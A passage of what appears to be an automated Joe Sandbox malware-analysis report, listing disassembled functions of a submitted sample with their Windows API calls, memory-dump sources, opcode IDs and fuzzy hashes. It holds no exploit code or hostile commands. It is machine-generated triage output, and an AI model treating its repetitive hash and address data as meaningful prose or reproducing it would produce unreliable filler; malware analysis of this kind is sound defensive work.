                                                                                        • Instruction Fuzzy Hash: 72414E72D0021CAFDB10DFA4DC81AEEB7B8AF09710F004095FA55B7181DB756E85DBA1
                                                                                        Function 00F4A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F7DC00,00000000,?,?,?,?), ref: 00F4A6D8
                                                                                        • GetWindowLongW.USER32 ref: 00F4A6F5
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F4A705
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long
                                                                                        • String ID: SysTreeView32
                                                                                        • API String ID: 847901565-1698111956
                                                                                        • Opcode ID: b4f5cf4c1856080acdc7410dd35b6f4b7b581dfc397b0ecba3db2fe39c243261
                                                                                        • Instruction ID: b5218b252531a249b1b8fcb3040022fbcbb75f3dd038bbe757dda4043311cf07
                                                                                        • Opcode Fuzzy Hash: b4f5cf4c1856080acdc7410dd35b6f4b7b581dfc397b0ecba3db2fe39c243261
                                                                                        • Instruction Fuzzy Hash: EB31AE31A41209ABDB218E38CC41BEA7BA9FB49334F254715F975A32E0D770A851AB51
                                                                                        Function 00F4A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F4A15E
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F4A172
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F4A196
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: f5d41a13be112e81dcb21b5570fc88b156f9a272d26a40e8dae3b01bbd36f300
                                                                                        • Instruction ID: e8d7613362c6193a83e50efe45f72b015d1b68e98f9c1ef6d1482b99c9f5e5d3
                                                                                        • Opcode Fuzzy Hash: f5d41a13be112e81dcb21b5570fc88b156f9a272d26a40e8dae3b01bbd36f300
                                                                                        • Instruction Fuzzy Hash: 7F21A132950218ABEF118F94CC42FEA3B79FF88764F110214FE55AB1D0D6B5AC51EB90
                                                                                        Function 00F4A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F4A941
                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F4A94F
                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F4A956
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                        • String ID: msctls_updown32
                                                                                        • API String ID: 4014797782-2298589950
                                                                                        • Opcode ID: f7088100926e1fcdf3d63663fde2ead12f7546eb00ad2cabd58995dd1e41a7d4
                                                                                        • Instruction ID: 29627aeae3646f860d331f001338928a29aaa2191447129e0bac5777ce6221ad
                                                                                        • Opcode Fuzzy Hash: f7088100926e1fcdf3d63663fde2ead12f7546eb00ad2cabd58995dd1e41a7d4
                                                                                        • Instruction Fuzzy Hash: D82160B5A40209AFEB10DF18CC91D773BADEB5A3A4B050059FA149B3A1CB71EC11EB61
                                                                                        Function 00F499A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F49A30
                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F49A40
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F49A65
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MoveWindow
                                                                                        • String ID: Listbox
                                                                                        • API String ID: 3315199576-2633736733
                                                                                        • Opcode ID: 6e95cb4ed0317a8862f11ed7e8c2ef96c1a32703a894f554bf3da5c45bcc70a5
                                                                                        • Instruction ID: 787094a7fb7b40a700bd681d8b9cfd9db6cd907cc8bdc504fdf0703137ebfd7b
                                                                                        • Opcode Fuzzy Hash: 6e95cb4ed0317a8862f11ed7e8c2ef96c1a32703a894f554bf3da5c45bcc70a5
                                                                                        • Instruction Fuzzy Hash: B4219572B14118BFDF118F54CC85FBF3BAAEF89760F018129F95497190C6B59C51A7A0
                                                                                        Function 00F4A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F4A46D
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F4A482
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F4A48F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: 4406196e2ba8fb6e8bf29d17b44ab432de9651becca2a66d66051d3c947bbe25
                                                                                        • Instruction ID: 7be7a166079c1811f9370f313e959bee9b044e0bfb80108a7b2b9f4d67185f8a
                                                                                        • Opcode Fuzzy Hash: 4406196e2ba8fb6e8bf29d17b44ab432de9651becca2a66d66051d3c947bbe25
                                                                                        • Instruction Fuzzy Hash: D011E771640208BEEF209F65CC49FAB3B69FF89764F114118FA45A60B1D2B2E811E720
                                                                                        Function 00F02287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00F02350,?), ref: 00F022A1
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00F022A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RoInitialize$combase.dll
                                                                                        • API String ID: 2574300362-340411864
                                                                                        • Opcode ID: e2f676fdb8ba14dc8925f64aa869b66788fff12931f59c6c7b97241b77634a69
                                                                                        • Instruction ID: 30984731337b63d29e8bfa8e1a682ed02edbca0449369215f27d1b3b0ea732fc
                                                                                        • Opcode Fuzzy Hash: e2f676fdb8ba14dc8925f64aa869b66788fff12931f59c6c7b97241b77634a69
                                                                                        • Instruction Fuzzy Hash: EFE01AB4E94308ABEB905FB1EC4DB543664A702716F104020F102D60F0CFF88051FF16
                                                                                        Function 00F0235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F02276), ref: 00F02376
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00F0237D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                        • API String ID: 2574300362-2819208100
                                                                                        • Opcode ID: e3f4f2b6bf6b3c2e5af353f08f6cc78911a117713c36476c730178705e6c8564
                                                                                        • Instruction ID: d9bcc668c9d969d15bede011247a0cd8f0c2c38e725ef71b56b28a425f51248d
                                                                                        • Opcode Fuzzy Hash: e3f4f2b6bf6b3c2e5af353f08f6cc78911a117713c36476c730178705e6c8564
                                                                                        • Instruction Fuzzy Hash: EFE0BDF0B88308ABEB606F61FD0DB543A64B706706F100424F10AE20B4CBBA9420FA25
                                                                                        Function 00F5AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime__swprintf
                                                                                        • String ID: %.3d$WIN_XPe
                                                                                        • API String ID: 2070861257-2409531811
                                                                                        • Opcode ID: 791c848b229a875e2a49bf32cbf055bb0cc9a2fba3bc4d82c6143bc733b19b6f
                                                                                        • Instruction ID: eab82de737f1062a61942d5794f8f6daaa636032eabfcade1b240d1cda7d0c64
                                                                                        • Opcode Fuzzy Hash: 791c848b229a875e2a49bf32cbf055bb0cc9a2fba3bc4d82c6143bc733b19b6f
                                                                                        • Instruction Fuzzy Hash: 0FE0127280461CDBCB109790CD09EF9737CA704742F5001D2FE16A1000D675DBA8BB23
                                                                                        Function 00EE42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00EE42EC,?,00EE42AA,?), ref: 00EE4304
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EE4316
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-1355242751
                                                                                        • Opcode ID: e296453b5278ec1c6562dc44ba4e6e315dd014bcd7ccd758a20a26f11386c23d
                                                                                        • Instruction ID: c8a28a02232dba4e54c5c42bac6f1152b96886afd385b02f72992348611f0794
                                                                                        • Opcode Fuzzy Hash: e296453b5278ec1c6562dc44ba4e6e315dd014bcd7ccd758a20a26f11386c23d
                                                                                        • Instruction Fuzzy Hash: 95D0A7B4900716EFFB205F22E80C60176D4AB05309B004419E451E22A4D7F0C8809610
                                                                                        Function 00F42205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F421FB,?,00F423EF), ref: 00F42213
                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00F42225
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetProcessId$kernel32.dll
                                                                                        • API String ID: 2574300362-399901964
                                                                                        • Opcode ID: 66a56647a4461f1a8cfeac8cdb40febd44ae8014784834e3f5c34d05609b1e1d
                                                                                        • Instruction ID: 828f71b9b64ca0552ba8e9e85a6384a5b8170dc6573b877bdd739f6d6543c74c
                                                                                        • Opcode Fuzzy Hash: 66a56647a4461f1a8cfeac8cdb40febd44ae8014784834e3f5c34d05609b1e1d
                                                                                        • Instruction Fuzzy Hash: B4D0A734D007169FFBB15F71F8086017BD4EB0A314B004429FC51E2150D7F4D880FA60
                                                                                        Function 00EE434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00EE41BB,00EE4341,?,00EE422F,?,00EE41BB,?,?,?,?,00EE39FE,?,00000001), ref: 00EE4359
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EE436B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-3689287502
                                                                                        • Opcode ID: ff715e0a44e1e828f73644123687fc34900dbee4bf94dd8f92e9c53beb1445df
                                                                                        • Instruction ID: 38386ece3bb387d359b1c9899a6ab4ea9f235f4ddcbdd2a3f45284075cd0afc0
                                                                                        • Opcode Fuzzy Hash: ff715e0a44e1e828f73644123687fc34900dbee4bf94dd8f92e9c53beb1445df
                                                                                        • Instruction Fuzzy Hash: E2D0A770900716AFEB205F33E80C60276D4AB1171DB004519E491E2190D7F0D880D610
                                                                                        Function 00F20564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00F2052F,?,00F206D7), ref: 00F20572
                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00F20584
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                        • API String ID: 2574300362-1587604923
                                                                                        • Opcode ID: 6202680ae63690c3d4ed4ee985b2257160351d20b65199326368117c5f31c175
                                                                                        • Instruction ID: b2b61a2b97c2948e460aa7416f5e69170c60242d340a904fc89300434ea1fd9a
                                                                                        • Opcode Fuzzy Hash: 6202680ae63690c3d4ed4ee985b2257160351d20b65199326368117c5f31c175
                                                                                        • Instruction Fuzzy Hash: 0AD0A731E00322AFEB205F31F809F0277E8AF05318B14851DE855D2151DBF0C4C0AA20
                                                                                        Function 00F20539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,00F2051D,?,00F205FE), ref: 00F20547
                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00F20559
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                        • API String ID: 2574300362-1071820185
                                                                                        • Opcode ID: defdd7171620ef12de5a3c2e82810afd12a3b4cecb95466e6d7b6537f125828a
                                                                                        • Instruction ID: aea534ce889542584ec0a00599229d2eedbec50db2ab40123102dbef49b1c125
                                                                                        • Opcode Fuzzy Hash: defdd7171620ef12de5a3c2e82810afd12a3b4cecb95466e6d7b6537f125828a
                                                                                        • Instruction Fuzzy Hash: B3D0A731E00722AFEB208F21F80960176E4AB01319B14C41DF456D2151DAF0C880AA50
                                                                                        Function 00F3ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F3ECBE,?,00F3EBBB), ref: 00F3ECD6
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F3ECE8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                        • API String ID: 2574300362-1816364905
                                                                                        • Opcode ID: 33867c44b0caf37c74769ff9d3b5a51a6deef3103ecb2e735b752021d6c1437e
                                                                                        • Instruction ID: d7dcbc7de6763b80d6285d4320f687ae909cf2965f1e6f90a4f0b404665cdeac
                                                                                        • Opcode Fuzzy Hash: 33867c44b0caf37c74769ff9d3b5a51a6deef3103ecb2e735b752021d6c1437e
                                                                                        • Instruction Fuzzy Hash: 20D0A730D00723AFEF205F65E84864676E4AF01764F008419FC55D2191DBF0D881F710
                                                                                        Function 00F3BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00F3BAD3,00000001,00F3B6EE,?,00F7DC00), ref: 00F3BAEB
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F3BAFD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 2574300362-199464113
                                                                                        • Opcode ID: 6adb62ca9f00651583210b89ec5e651b62298384126d08fa6dec4da8998ce676
                                                                                        • Instruction ID: 581912b6b1badf65817c5219045024bb3a7af89d17f8f8b08221c2d13955ef21
                                                                                        • Opcode Fuzzy Hash: 6adb62ca9f00651583210b89ec5e651b62298384126d08fa6dec4da8998ce676
                                                                                        • Instruction Fuzzy Hash: EFD0A730D007129FEB305F21E848B11B6D4AB01324F004419E953D2154DBF0D880E611
                                                                                        Function 00F43BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
